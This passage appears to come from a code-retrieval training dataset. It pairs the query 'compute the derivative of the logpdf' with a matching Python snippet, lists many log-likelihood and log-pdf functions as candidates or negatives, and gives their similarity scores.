isinstance(X, np.ndarray):\n X = np.array(X)\n H = 0.5 * ((X - self.means) / self.scales) ** 2\n Z = sqrt(2 * pi) * self.scales\n return -np.sum(H + np.log(Z), axis=1)", "def logistic_log_pdf(x: JaxArray, mean: JaxArray, scale: JaxArray) -> JaxArray:\n\n # change of variables\n z = (x - mean) / scale\n\n # log probability\n # log_prob = z - np.log(scale) - 2 * jax.nn.softplus(z)\n # log_prob = jax.scipy.stats.logistic.logpdf(z)\n log_prob = z - np.log(scale) - 2 * softplus(z)\n\n return log_prob", "def logpdf(self, f, y, Y_metadata=None):\n if isinstance(self.gp_link, link_functions.Identity):\n return self.logpdf_link(f, y, Y_metadata=Y_metadata)\n else:\n inv_link_f = self.gp_link.transf(f)\n return self.logpdf_link(inv_link_f, y, Y_metadata=Y_metadata)", "def log_likelihood(self):\n\n if self._log_likelihood is None:\n self._log_likelihood = logpdf(x=self.y, cov=self.S)\n return self._log_likelihood", "def calc_F(self, peq):\n return self.dmat_d_.dot(np.log(peq))", "def log_prob(self):", "def logpdf(self, x, norm=False):\n raise NotImplementedError(\"Normalized logposterior not implemented\")", "def all_logpdf(x, shape_par):\n return stat.logpdf(x, *shape_par)", "def logp(self, F, Y):\n raise NotImplementedError(\"implement the logp function\\\n for this likelihood\")", "def logpdf_link(self, link_f, y, Y_metadata=None):\n log_objective = np.log(link_f) - y*link_f\n return log_objective", "def invwish_logpdf(X, S, df):\n d = X.shape[0]\n if df < d:\n raise ValueError('df must be greater than or equal to the number of '\n ' dimensions of S')\n if d != X.shape[1]:\n raise ValueError('X must be square.')\n if S.shape[0] != d or S.shape[1] != d:\n raise ValueError('S must be the same shape as X.')\n\n _, logdet_S = slogdet(S)\n _, logdet_X = slogdet(X)\n\n logpdf = (df/2)*logdet_S - ((df*d/2)*log(2) + multigammaln(df/2, d))\n logpdf += (-(d+df+1)/2)*logdet_X - (1/2)*trace(solve(X.T, S.T))\n\n return logpdf", "def M(f):\n return 1127 * numpy.log(1 + f/700.0)", "def log_norm_pdf(x, sigma):\n _, det_sigma = np.linalg.slogdet(sigma)\n return -0.5*np.dot(x.T, np.linalg.solve(sigma,x))[0,0] - np.log(2*np.pi) - det_sigma", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.asarray(link_f).shape == np.asarray(y).shape\r\n return -0.5*(np.sum((y-link_f)**2/self.variance) + self.ln_det_K + self.N*np.log(2.*np.pi))", "def conditional_pdf(self, x1, x2 = None):\n return np.exp(self.conditional_logpdf(x1, x2))", "def log_like_gamma(params, n):\n alpha, beta = params\n\n # limits:\n # alpha > 0\n # beta > 0\n if alpha <= 0 or beta <= 0:\n return -np.inf\n\n return np.sum(st.gamma.logpdf(n, alpha, scale=1/beta))", "def log(x, base=math.e):\n return 0.0", "def logpdf(self, x, mean, cov):\r\n dim, mean, cov = _process_parameters(None, mean, cov)\r\n x = _process_quantiles(x, dim)\r\n prec_U, log_det_cov = _psd_pinv_decomposed_log_pdet(cov)\r\n out = self._logpdf(x, mean, prec_U, log_det_cov)\r\n return _squeeze_output(out)", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n log_objective = np.log(link_f) - y*link_f\r\n #logpdf_link = np.sum(-np.log(link_f) - y/link_f)\r\n return np.sum(log_objective)", "def weight_log(val):\n return val * math.log(val)", "def my_log(num):\n\n if num == 0.0:\n return -9999999999\n return math.log(num)", "def _loglike(self, y, f):\n ll = -0.5 * (tf.log(2 * self.variance * np.pi) +\n (y - f)**2 / self.variance)\n return ll", "def logpdf(self, X) -> np.ndarray:\n comp_logpdfs = [np.reshape(comp.logpdf(X), [-1, 1]) for comp in self.components]\n logpdfs = np.hstack(comp_logpdfs)\n result = logsumexp(logpdfs, axis=1, b=self.coefficients)\n return np.array(result)", "def mpf_log(x, prec, rnd=round_fast):\n sign, man, exp, bc = x\n #------------------------------------------------------------------\n # Handle special values\n if not man:\n if x == fzero: return fninf\n if x == finf: return finf\n if x == fnan: return fnan\n if sign:\n raise ComplexResult(\"logarithm of a negative number\")\n wp = prec + 20\n #------------------------------------------------------------------\n # Handle log(2^n) = log(n)*2.\n # Here we catch the only possible exact value, log(1) = 0\n if man == 1:\n if not exp:\n return fzero\n return from_man_exp(exp*ln2_fixed(wp), -wp, prec, rnd)\n mag = exp+bc\n abs_mag = abs(mag)\n #------------------------------------------------------------------\n # Handle x = 1+eps, where log(x) ~ x. We need to check for\n # cancellation when moving to fixed-point math and compensate\n # by increasing the precision. Note that abs_mag in (0, 1) <=>\n # 0.5 < x < 2 and x != 1\n if abs_mag <= 1:\n # Calculate t = x-1 to measure distance from 1 in bits\n tsign = 1-abs_mag\n if tsign:\n tman = (MPZ_ONE<<bc) - man\n else:\n tman = man - (MPZ_ONE<<(bc-1))\n tbc = bitcount(tman)\n cancellation = bc - tbc\n if cancellation > wp:\n t = normalize(tsign, tman, abs_mag-bc, tbc, tbc, 'n')\n return mpf_perturb(t, tsign, prec, rnd)\n else:\n wp += cancellation\n # TODO: if close enough to 1, we could use Taylor series\n # even in the AGM precision range, since the Taylor series\n # converges rapidly\n #------------------------------------------------------------------\n # Another special case:\n # n*log(2) is a good enough approximation\n if abs_mag > 10000:\n if bitcount(abs_mag) > wp:\n return from_man_exp(exp*ln2_fixed(wp), -wp, prec, rnd)\n #------------------------------------------------------------------\n # General case.\n # Perform argument reduction using log(x) = log(x*2^n) - n*log(2):\n # If we are in the Taylor precision range, choose magnitude 0 or 1.\n # If we are in the AGM precision range, choose magnitude -m for\n # some large m; benchmarking on one machine showed m = prec/20 to be\n # optimal between 1000 and 100,000 digits.\n if wp <= LOG_TAYLOR_PREC:\n m = log_taylor_cached(lshift(man, wp-bc), wp)\n if mag:\n m += mag*ln2_fixed(wp)\n else:\n optimal_mag = -wp//LOG_AGM_MAG_PREC_RATIO\n n = optimal_mag - mag\n x = mpf_shift(x, n)\n wp += (-optimal_mag)\n m = -log_agm(to_fixed(x, wp), wp)\n m -= n*ln2_fixed(wp)\n return from_man_exp(m, -wp, prec, rnd)", "def smart_log(self, value: float) -> float:\n if value > 0:\n return math.log(value, self.log_scale)\n elif value == 0:\n return 0\n elif value < 0:\n return -(math.log(abs(value), self.log_scale))", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n return np.sum(-link_f + y*np.log(link_f) - special.gammaln(y+1))", "def make_ln_func(variable):\n def safe_ln_queryset(qs):\n \"\"\"Takes the natural log of a queryset's values and handles zeros\"\"\"\n vals = qs.values_list(variable, flat=True)\n ret = np.log(vals)\n ret[ret == -np.inf] = 0\n return ret\n return safe_ln_queryset", "def compute_log_prior(self,params: ndarray) -> float:\n ln_tE = params[0]\n ln_A0 = params[1]\n ln_deltaT = params[2]\n fbl = params[3]\n mb = params[4]\n\n # Equation (16,15,17) (note that Albrow uses \"log\" for log10)\n log10e = np.log10(np.exp(1))\n ln_pr_ln_tE = np.log(0.476) - ((log10e*ln_tE - 1.333)**2 / 0.330) + np.log(log10e)\n ln_pr_ln_A0 = np.log(0.660) - (1.289*log10e*ln_A0) + np.log(log10e)\n ln_pr_ln_deltaT = np.log(0.156) - ((log10e*ln_deltaT - 1.432)**2 / 0.458) +\\\n np.log(log10e)\n \n # Paper doesnt mention the prior used, but I assume it to be uniform\n ln_pr_fbl = uniform.logpdf(fbl,0.0,1.0)\n\n # Paper doesnr mention the prior used but I will asuumed it to be uniform\n ln_pr_mb = uniform.logpdf(mb,self.mag_min - 1.0, self.mag_max + 1.0)\n \n \n return ln_pr_fbl + ln_pr_ln_A0 + ln_pr_ln_deltaT + ln_pr_ln_tE + ln_pr_mb", "def log(self, base):\n\n\t\tvalues = map(lambda x: x > 0, self.val)\n\t\tif not all(values):\n\t\t\traise ValueError(\"Non-positive number encountered in log.\")\n\t\telse:\n\t\t\tval = np.array([np.math.log(v, base) for v in self.val])\n\t\t\tif len(self.der.shape):\n\t\t\t\tto_multiply = 1 / np.multiply(np.log(base), self.val)\n\t\t\t\tto_multiply = np.expand_dims(to_multiply, 1) if len(self.der.shape) > len(to_multiply.shape) else to_multiply\n\t\t\t\tder = np.multiply(to_multiply, self.der)\n\t\t\telse:\n\t\t\t\tder = None\n\t\treturn Var(val, der)", "def logpdf(self, X, pool=None):\n logpdfs = []\n for logweight, space, kde in zip(self._logweights,\n self._spaces,\n self._kdes):\n # Calculate the probability for each parameter space individually\n if np.all(space == ~X.mask) and np.isfinite(logweight):\n logpdfs.append(logweight + kde(X[space], pool=pool))\n\n return logsumexp(logpdfs, axis=0)", "def pdf(self, x):\n\t\treturn 1.5 * np.power(x,2) ##obtained after finding z from integrating x^2 from -1 to 1", "def _log_prior_gradients(self):\r\n if self.priors is None:\r\n return 0.\r\n x = self._get_params()\r\n ret = np.zeros(x.size)\r\n [np.put(ret, i, p.lnpdf_grad(xx)) for i, (p, xx) in enumerate(zip(self.priors, x)) if not p is None]\r\n return ret", "def pdf(self, grid, dataSegment):\n return np.exp(\n -((dataSegment[0] - grid[0]) ** 2.) / (2. * grid[1] ** 2.) - .5 * np.log(2. * np.pi * grid[1] ** 2.))", "def compute_log_prob(self,params: ndarray) -> float:\n return self.compute_log_prior(params) + self.compute_log_likelihood(params)", "def log1p(x):\n return 0.0", "def pdf(self, grid, dataSegment):\n return (grid[0] ** dataSegment[0]) * (np.exp(-grid[0])) / (np.math.factorial(dataSegment[0]))", "def logp(value, nu, mu, scale):\n quaddist, logdet, ok = quaddist_parse(value, mu, scale)\n k = floatX(value.shape[-1])\n\n norm = gammaln((nu + k) / 2.0) - gammaln(nu / 2.0) - 0.5 * k * pt.log(nu * np.pi)\n inner = -(nu + k) / 2.0 * pt.log1p(quaddist / nu)\n res = norm + inner - logdet\n\n return check_parameters(res, ok, nu > 0, msg=\"posdef, nu > 0\")", "def logit_link(x):\n\n return 1 / (1 + math.exp(-0.05 * x))\n # return 1 / (1 + math.exp(-0.01 * x))", "def safelog(x):\n #return np.log(x)\n return np.log(np.clip(x,floor,np.inf))", "def log_data_prob(self, x):\n _dist = norm(self.data, self.err)\n lp = _dist.logpdf(x)\n for i in range(6):\n lp[np.isnan(lp[:,i]),i] = self.default_priors[np.isnan(lp[:,i]),i]\n\n return lp.sum(axis=1)", "def log10(x):\n return 0.0", "def _log_prior_gradients(self):\n x = self._get_params()\n ret = np.zeros(x.size)\n [np.put(ret,i,p.lnpdf_grad(xx)) for i,(p,xx) in enumerate(zip(self.priors,x)) if not p is None]\n return ret", "def joint_logpdf(self, x1, x2 = None):\n dists = self.conditionalMVNs\n joint_pdfs = np.array([d.joint_pdf(x1, x2) for d in dists])\n return np.log(np.sum(self.weights * joint_pdfs))", "def pdf(self, grid, dataSegment):\n return np.exp(-(dataSegment[0] ** 2.) / (2. * grid[0] ** 2.) - .5 * np.log(2. * np.pi * grid[0] ** 2.))", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n e = y - link_f\r\n objective = (+ gammaln((self.v + 1) * 0.5)\r\n - gammaln(self.v * 0.5)\r\n - 0.5*np.log(self.sigma2 * self.v * np.pi)\r\n - 0.5*(self.v + 1)*np.log(1 + (1/np.float(self.v))*((e**2)/self.sigma2))\r\n )\r\n return np.sum(objective)", "def poisson_pdf(x, u, log=False):\n #return np.exp(-u)*(u**x)/factorial(x)\n #return np.exp(-u)*(u**x)/gamma(x+1)\n if log:\n return poisson.logpmf(x, u)\n return poisson.pmf(x, u)", "def log_pdf(self, X, Y):\n assert self.fitted, \"model must be fitted to compute likelihood score\"\n X, Y = self._handle_input_dimensionality(X, Y, fitting=False)\n p = self.sess.run(self.log_pdf_, feed_dict={self.X_ph: X, self.Y_ph: Y})\n assert p.ndim == 1 and p.shape[0] == X.shape[0]\n return p", "def ln(x):\n return log(x, const.e)", "def logpowerlaw(x, p=default()):\n xtr, ytr, gradtr = logcontinuity(p)\n power = p[3]\n x0 = xtr - power/gradtr\n b = ytr - power*np.log(xtr-x0)\n return b + power*np.log(x-x0)", "def pdf(self, grid, dataSegment):\n return np.exp(-((dataSegment[1] - grid[0] * dataSegment[0]) ** 2.) / (2. * grid[1] ** 2.) - .5 * np.log(\n 2. * np.pi * grid[1] ** 2.))", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n #objective = y*np.log(link_f) + (1.-y)*np.log(link_f)\r\n objective = np.where(y==1, np.log(link_f), np.log(1-link_f))\r\n return np.sum(objective)", "def poisson_log_likelihood(x, log_rate):\n return x * log_rate - np.exp(log_rate) - lax.lgamma(x + 1.0)", "def fn(a, y):\n return np.sum(np.nan_to_num(-y*np.log(a)-(1-y)*np.log(1-a)))", "def log_gamma_unnormalised_lpdf(x, alpha, beta):\n return alpha * x - beta * tf.exp(x)", "def _loglike(self, y, f):\n bincoef = tf.lgamma(self.n + 1) - tf.lgamma(y + 1) \\\n - tf.lgamma(self.n - y + 1)\n ll = bincoef + y * tf.log(pos(f)) + (self.n - y) * tf.log(pos(1 - f))\n return ll", "def log_prob(self, x):\n z, log_det = self.backward_p(x)\n return self.prior.log_prob(z) + log_det", "def Log(num):\n return math.log(float(num))", "def logp(self, x):\n pass", "def log_pdf_normal(s):\n return jnp.sum(norm.logpdf(s))", "def loglog_interp(x,xp,fp):\n lx = np.log(x)\n lxp = np.log(xp)\n lfp = np.log(fp)\n return np.exp(np.interp(lx,lxp,lfp))", "def log(base, real):\n return math.log(real, base)", "def logpdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n #alpha = self.gp_link.transf(gp)*self.beta\r\n #return (1. - alpha)*np.log(obs) + self.beta*obs - alpha * np.log(self.beta) + np.log(special.gamma(alpha))\r\n alpha = link_f*self.beta\r\n log_objective = alpha*np.log(self.beta) - np.log(special.gamma(alpha)) + (alpha - 1)*np.log(y) - self.beta*y\r\n return np.sum(log_objective)", "def f_log_encoding(x, in_reflection=False):\n a = 0.555556\n b = 0.009468\n c = 0.344676\n d = 0.790453\n e = 8.735631\n f = 0.092864\n cut1 = 0.00089\n\n if not in_reflection:\n x = x * 0.9\n\n y = np.where(x < cut1,\n e * x + f,\n c * np.log10(a * x + b) + d)\n\n return y", "def log_probability(theta):\n global priors\n global logp\n lp = np.sum([priors[p].logpdf(x) for p, x in zip(logp.parnames, theta)])\n if not np.isfinite(lp) or np.isnan(lp):\n return -np.inf\n ll = logp(theta)\n if not np.isfinite(ll):\n return -np.inf\n return lp + ll", "def log_probability(theta):\n global priors\n global logp\n lp = np.sum([priors[p].logpdf(x) for p, x in zip(logp.parnames, theta)])\n if not np.isfinite(lp) or np.isnan(lp):\n return -np.inf\n ll = logp(theta)\n if not np.isfinite(ll):\n return -np.inf\n return lp + ll", "def log_likelihood(parameters):\n if len(copula.bounds_param) == 1:\n params = [parameters]\n else:\n param1, param2 = parameters\n params = [param1, param2]\n logl = -np.sum(np.log(copula.get_pdf(psd_obs[0], psd_obs[1], params)))\n return logl", "def cdf(self,x):\n if self.base == 'natural':\n cdfValue = (math.log(x)-self.lowerBound)/(self.upperBound-self.lowerBound)\n else:\n cdfValue = (math.log10(x)-self.lowerBound)/(self.upperBound-self.lowerBound)\n return cdfValue", "def likelihood(mean, logs, x):\n return -0.5 * (logs * 2. + ((x - mean) ** 2) / np.exp(logs * 2.) + GaussianDiag.Log2PI)", "def pdf(self, x, log=False):\n assert x.shape[0] == self.num_vars()\n if log is False:\n marginal_vals = self.evaluate(\"pdf\", x)\n return np.prod(marginal_vals, axis=0)[:, None]\n\n marginal_vals = self.evaluate(\"logpdf\", x)\n return np.sum(marginal_vals, axis=0)[:, None]", "def f_log_decoding(x, out_reflection=False):\n a = 0.555556\n b = 0.009468\n c = 0.344676\n d = 0.790453\n e = 8.735631\n f = 0.092864\n cut2 = 0.100537775223865\n\n y = np.where(x < cut2,\n (x - f) / e,\n (10 ** ((x - d) / c)) / a - (b / a))\n\n if not out_reflection:\n y = y / 0.9\n\n return y", "def log(self, x, base=2):\n if x == 0:\n return 0\n return math.log(x, base)", "def log_likelihood(self):\r\n if self.likelihood.is_heteroscedastic:\r\n A = -0.5 * self.num_data * self.output_dim * np.log(2.*np.pi) + 0.5 * np.sum(np.log(self.likelihood.precision)) - 0.5 * np.sum(self.likelihood.V * self.likelihood.Y)\r\n B = -0.5 * self.output_dim * (np.sum(self.likelihood.precision.flatten() * self.psi0) - np.trace(self._A))\r\n else:\r\n A = -0.5 * self.num_data * self.output_dim * (np.log(2.*np.pi) - np.log(self.likelihood.precision)) - 0.5 * self.likelihood.precision * self.likelihood.trYYT\r\n B = -0.5 * self.output_dim * (np.sum(self.likelihood.precision * self.psi0) - np.trace(self._A))\r\n C = -self.output_dim * (np.sum(np.log(np.diag(self.LB)))) # + 0.5 * self.num_inducing * np.log(sf2))\r\n D = 0.5 * self.data_fit\r\n self._A_part, self._B_part, self._C_part, self._D_part = A, B, C, D\r\n return A + B + C + D + self.likelihood.Z", "def log_probability(self, X):\n\n\t\treturn self.__log_probability(X)", "def log_prob(self):\n res = -self.L_h/2*np.log(2*np.pi*self.la)\n res = res + self.L_h*(self.L_h-1)/2*self.a\n\n\n res = res - 1/(2*self.la)*np.square(np.linalg.norm(self.e*self.pie))\n\n res = res - 1/(2*self.la)*np.sum(self.e2*self.pie_var)\n\n res = res - self.L_h/2*np.log(2*np.pi*self.sigma2)\n res = res - 1/(2*self.sigma2)*(np.square(np.linalg.norm(self.w))+np.trace(self.R))\n\n print(\"Log-probability difference = {}\".format(res - self.LP), file=self.logfile)\n self.LP = res\n return res", "def log10(self):\n return Factor().__build( VarSet(self.v) , np.log10(self.t) )", "def log_marginal_likelihood_normal_pdf(self):\n noise_variance=self.params['noise_variance']['value']\n Kxx = self.C@self._Kernel(self.X, self.X, self.params)@self.C.T + (noise_variance+self.jitter) * np.eye(self.Y.shape[0])\n try:\n mu = np.linalg.solve(Kxx, self.Y)\n (sign, logdet) = np.linalg.slogdet(2 * np.pi * Kxx) \n logp1 = -0.5*np.asscalar(self.Y.T@mu)-0.5*logdet \n except:\n logp1=-10.0**300\n return logp1", "def logp(rv, value):\n\n value = at.as_tensor_variable(value, dtype=rv.dtype)\n return logp_aeppl(rv, value)" ]
[ "0.808809", "0.808809", "0.7765762", "0.767868", "0.7636893", "0.74008185", "0.7215648", "0.7135841", "0.7101646", "0.7030553", "0.6977651", "0.6970404", "0.6965355", "0.6961038", "0.6950404", "0.6910325", "0.6866383", "0.68497586", "0.68354607", "0.6822285", "0.6806993", "0.67821145", "0.67699516", "0.6757158", "0.6748133", "0.6724406", "0.6719789", "0.669577", "0.6682538", "0.66723865", "0.6657915", "0.66562104", "0.6633829", "0.6627472", "0.65701485", "0.6569322", "0.6568259", "0.65561724", "0.6549221", "0.6544437", "0.65288615", "0.65124863", "0.65120834", "0.6507177", "0.6502237", "0.6493888", "0.6493239", "0.64926547", "0.649149", "0.6484289", "0.64814305", "0.6457287", "0.6456921", "0.6452463", "0.644757", "0.6444243", "0.64397997", "0.64356613", "0.64217526", "0.6412191", "0.63982147", "0.6362441", "0.6359247", "0.63587165", "0.6357432", "0.6355754", "0.6340672", "0.6339925", "0.6338707", "0.63378835", "0.6335183", "0.6332686", "0.63256246", "0.63164663", "0.6306894", "0.63067836", "0.6305134", "0.62998223", "0.628886", "0.6288018", "0.6287504", "0.62782973", "0.6274838", "0.6271202", "0.6270841", "0.62639505", "0.62619615", "0.62619615", "0.626129", "0.6258783", "0.6256326", "0.62548256", "0.6250686", "0.6244264", "0.62427914", "0.6237538", "0.62349933", "0.6225776", "0.6220251", "0.6214577" ]
0.7301884
6
Compute the derivative of the logpdf with respect to the parameters.
def log_pdf_derivative(x): return gs.autodiff.jacobian(log_pdf_at_x(x))(base_point)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def log_pdf_derivative_squared(x):\n dlog = log_pdf_derivative(x)\n return gs.einsum(\"...i, ...j -> ...ij\", dlog, dlog)", "def logpdf(self, x):\n if self.transform is not None:\n x = self.transform(x) \n return (-self.alpha-1)*np.log(x) - (self.beta/float(x))", "def log_deriv(error):\n return logistic(error) * (1 - logistic(error))", "def grad_log(self, X):\n # \"\"\"\n # Evaluate the gradients (with respect to the input) of the log density at\n # each of the n points in X. This is the score function.\n\n # X: n x d numpy array.\n XB = np.dot(X, self.B)\n Y = 0.5*XB + self.c\n E2y = np.exp(2*Y)\n # n x dh\n Phi = old_div((E2y-1.0),(E2y+1))\n # n x dx\n T = np.dot(Phi, 0.5*self.B.T)\n S = self.b - X + T\n return S", "def _evaluate_point_logpdf(args):\n x, data, cho_factor = args\n\n # Use Cholesky decomposition to avoid direct inversion of covariance matrix\n diff = data - x\n tdiff = la.cho_solve(cho_factor, diff.T, check_finite=False).T\n diff *= tdiff\n\n # Work in the log to avoid large numbers\n return logsumexp(-np.sum(diff, axis=1)/2.0)", "def logpdf(x, a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n x = mp.mpf(x)\n if x < 0 or x > 1:\n return -mp.inf\n return (_fun.xlogy(a - 1, x) + _fun.xlog1py(b - 1, -x)\n - _fun.logbeta(a, b))", "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def logpdf(self, X) -> np.ndarray:\n return self.dist.logpdf(self.inv_trans(X))", "def logit_deriv(y):\n# if y.any() < 0.0 or y.any() > 1.0:\n# raise Exception\n\n return y*(1-y)", "def logp_grad(self, xs, ys, fs, **kwargs):", "def invwish_logpdf(X, S, df):\n d = X.shape[0]\n if df < d:\n raise ValueError('df must be greater than or equal to the number of '\n ' dimensions of S')\n if d != X.shape[1]:\n raise ValueError('X must be square.')\n if S.shape[0] != d or S.shape[1] != d:\n raise ValueError('S must be the same shape as X.')\n\n _, logdet_S = slogdet(S)\n _, logdet_X = slogdet(X)\n\n logpdf = (df/2)*logdet_S - ((df*d/2)*log(2) + multigammaln(df/2, d))\n logpdf += (-(d+df+1)/2)*logdet_X - (1/2)*trace(solve(X.T, S.T))\n\n return logpdf", "def conditional_logpdf(self, x1, x2 = None):\n f_x2 = self.unconditional_pdf_x2(x2)\n return self.joint_logpdf(x1, x2) - np.log(f_x2)", "def logpdf(x, p, temperature):\n assert x.shape == p.shape\n tol = 1e-7\n p = np.clip(p, tol, 1 - tol)\n x = np.clip(x, tol, 1 - tol)\n logit_p = logit(p)\n first_term = np.log(temperature) + logit_p - (1 + temperature) * np.log(x) - (1 + temperature) * np.log(1 - x)\n second_term = 2 * np.log((np.exp(logit_p) * (x ** (- temperature))) + (1 - x) ** (- temperature))\n return first_term - second_term", "def logpdf(self, X) -> np.ndarray:\n raise NotImplementedError", "def test_log():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.log(fwd.sin(x)+y**2)\n dfdx = lambda x, y: np.cos(x) / (np.sin(x)+y**2)\n dfdy = lambda x, y: 2*y / (np.sin(x)+y**2)\n d2fdxdy = lambda x, y: -2*y*np.cos(x) / (np.sin(x)+y**2)**2\n assert equals(f.evaluation_at({x: 1.5, y:2.5}), np.log(np.sin(1.5)+2.5**2))\n assert equals(f.derivative_at(x, {x: 1.5, y:2.5}), dfdx(1.5, 2.5))\n assert equals(f.derivative_at(y, {x: 1.5, y:2.5}), dfdy(1.5, 2.5))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}), d2fdxdy(1.5, 2.5))\n with pytest.raises(NotImplementedError):\n f.derivative_at(x, {x:1.0, y: 2.0}, order=3)", "def dlogpdf_dlink(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n grad = self.beta*np.log(self.beta*y) - special.psi(self.beta*link_f)*self.beta\r\n #old\r\n #return -self.gp_link.dtransf_df(gp)*self.beta*np.log(obs) + special.psi(self.gp_link.transf(gp)*self.beta) * self.gp_link.dtransf_df(gp)*self.beta\r\n return grad", "def dvdlogdp(self):\n return self.dndlogdp.mul(self.v_multiplier)", "def log_den(self, X):\n raise NotImplementedError()", "def _derivative_(self, x, diff_param=None):\n return 2*exp(-x**2)/sqrt(pi)", "def _log_prior_gradients(self):\n x = self._get_params()\n ret = np.zeros(x.size)\n [np.put(ret,i,p.lnpdf_grad(xx)) for i,(p,xx) in enumerate(zip(self.priors,x)) if not p is None]\n return ret", "def der_log(self, xr, xc=None, out=None):\n if xc is None:\n return self._pder_log(xr, out)\n else:\n return self._pder_log(_np.hstack((xr, xc)), out)", "def log_pdf(X, parameters):\n check_data_type_column_data(X)\n check_model_params_dict(parameters)\n\n sigma = (1.0/parameters['rho'])**.5\n\n return norm.logpdf(X,parameters['mu'],sigma)", "def _log_prior_gradients(self):\n if self.priors.size == 0:\n return 0.\n x = self.param_array\n ret = np.zeros(x.size)\n #compute derivate of prior density\n [np.put(ret, ind, p.lnpdf_grad(x[ind])) for p, ind in self.priors.items()]\n #add in jacobian derivatives if transformed\n priored_indexes = np.hstack([i for p, i in self.priors.items()])\n for c,j in self.constraints.items():\n if not isinstance(c, Transformation):continue\n for jj in j:\n if jj in priored_indexes:\n ret[jj] += c.log_jacobian_grad(x[jj])\n return ret", "def log_pdf(self, x):\n if x < 0:\n raise Exception(\"input value x can't be a negative value!\")\n\n if self.is_fit:\n if x >= 0:\n return -np.log(np.math.factorial(x)) + \\\n x * np.log(self.alpha) - self.alpha\n else:\n return 0\n else:\n raise Exception(\"Distribution doesn't have all parameters set!\")", "def dlogpdf_dlink(self, link_f, y, Y_metadata=None):\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\n c = np.zeros_like(y)\n if Y_metadata is not None and 'censored' in Y_metadata.keys():\n c = Y_metadata['censored']\n\n val = np.log(y) - link_f\n val_scaled = val/np.sqrt(self.variance)\n val_scaled2 = val/self.variance\n uncensored = (1-c)*(val_scaled2)\n a = (1- stats.norm.cdf(val_scaled))\n # llg(z) = 1. / (1 - norm_cdf(r / sqrt(s2))). * (1 / sqrt(2 * pi * s2). * exp(-1 / (2. * s2). * r. ^ 2));\n censored = c*( 1./a) * (np.exp(-1.* val**2 /(2*self.variance)) / np.sqrt(2*np.pi*self.variance))\n # censored = c * (1. / (1 - stats.norm.cdf(val_scaled))) * (stats.norm.pdf(val_scaled))\n gradient = uncensored + censored\n return gradient", "def grad_reglog(w, X, y, **kwargs):\n p = np.exp(-y * (np.dot(X, w)))\n P = p / (1. + p)\n return -1 * np.dot(X.T, P * y) / X.shape[0]", "def log_likelihood_gradients_(self, y, f):\n log_lik = self.evaluate_log_likelihood(y, f)\n f = np.squeeze(f)\n J = jacrev(self.evaluate_log_likelihood, argnums=1)\n H = jacrev(J, argnums=1)\n return log_lik, J(y, f), H(y, f)", "def dlogpdf_df(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n dlogpdf_dlink = self.dlogpdf_dlink(link_f, y, extra_data=extra_data)\r\n dlink_df = self.gp_link.dtransf_df(f)\r\n return chain_1(dlogpdf_dlink, dlink_df)", "def _log_likelihood_gradients(self):\r\n return np.hstack((self.kern.dK_dtheta(dL_dK=self.dL_dK, X=self.X), self.likelihood._gradients(partial=np.diag(self.dL_dK))))", "def dlogpdf_df(self, f, y, Y_metadata=None):\n if isinstance(self.gp_link, link_functions.Identity):\n return self.dlogpdf_dlink(f, y, Y_metadata=Y_metadata)\n else:\n inv_link_f = self.gp_link.transf(f)\n dlogpdf_dlink = self.dlogpdf_dlink(inv_link_f, y, Y_metadata=Y_metadata)\n dlink_df = self.gp_link.dtransf_df(f)\n return chain_1(dlogpdf_dlink, dlink_df)", "def pdf(self, x, log = False):\n if log:\n return D.logsumexp(\n D.multiple_gauss_den(x, self.mu, self.va, log = True)\n + N.log(self.w))\n else:\n return N.sum(D.multiple_gauss_den(x, self.mu, self.va) * self.w, 1)", "def logaddexp(X, Y):\n XY_max = T.maximum(X, Y)\n XY_min = T.minimum(X, Y)\n return XY_max + T.log1p(T.exp(XY_min - XY_max))", "def _log_likelihood_gradients(self):\n return np.hstack((self.kern.dK_dtheta(dL_dK=self.dL_dK,X=self.X,slices1=self.Xslices,slices2=self.Xslices), self.likelihood._gradients(partial=np.diag(self.dL_dK))))", "def logdprior(parameters, hyperparameters):\n sigma_w_part = parameters[0] + invgamma_logpdf(parameters[0],\n hyperparameters[\"sigma_w_shape\"], hyperparameters[\"sigma_w_scale\"])\n sigma_v_part = parameters[1] + invgamma_logpdf(parameters[1], hyperparameters[\"sigma_v_shape\"], hyperparameters[\"sigma_v_scale\"])\n return sigma_w_part + sigma_v_part", "def _log_prior_gradients(self):\r\n if self.priors is None:\r\n return 0.\r\n x = self._get_params()\r\n ret = np.zeros(x.size)\r\n [np.put(ret, i, p.lnpdf_grad(xx)) for i, (p, xx) in enumerate(zip(self.priors, x)) if not p is None]\r\n return ret", "def grad_log(self, X):\n g = autograd.elementwise_grad(self.log_den)\n G = g(X)\n return G", "def logistic_derivative(errors):\n return [log_deriv(error) for error in errors]", "def MvNormalLogp():\n cov = pt.matrix(\"cov\")\n cov.tag.test_value = floatX(np.eye(3))\n delta = pt.matrix(\"delta\")\n delta.tag.test_value = floatX(np.zeros((2, 3)))\n\n cholesky = Cholesky(lower=True, on_error=\"nan\")\n\n n, k = delta.shape\n n, k = f(n), f(k)\n chol_cov = cholesky(cov)\n diag = pt.diag(chol_cov)\n ok = pt.all(diag > 0)\n\n chol_cov = pt.switch(ok, chol_cov, pt.fill(chol_cov, 1))\n delta_trans = solve_lower(chol_cov, delta.T).T\n\n result = n * k * pt.log(f(2) * np.pi)\n result += f(2) * n 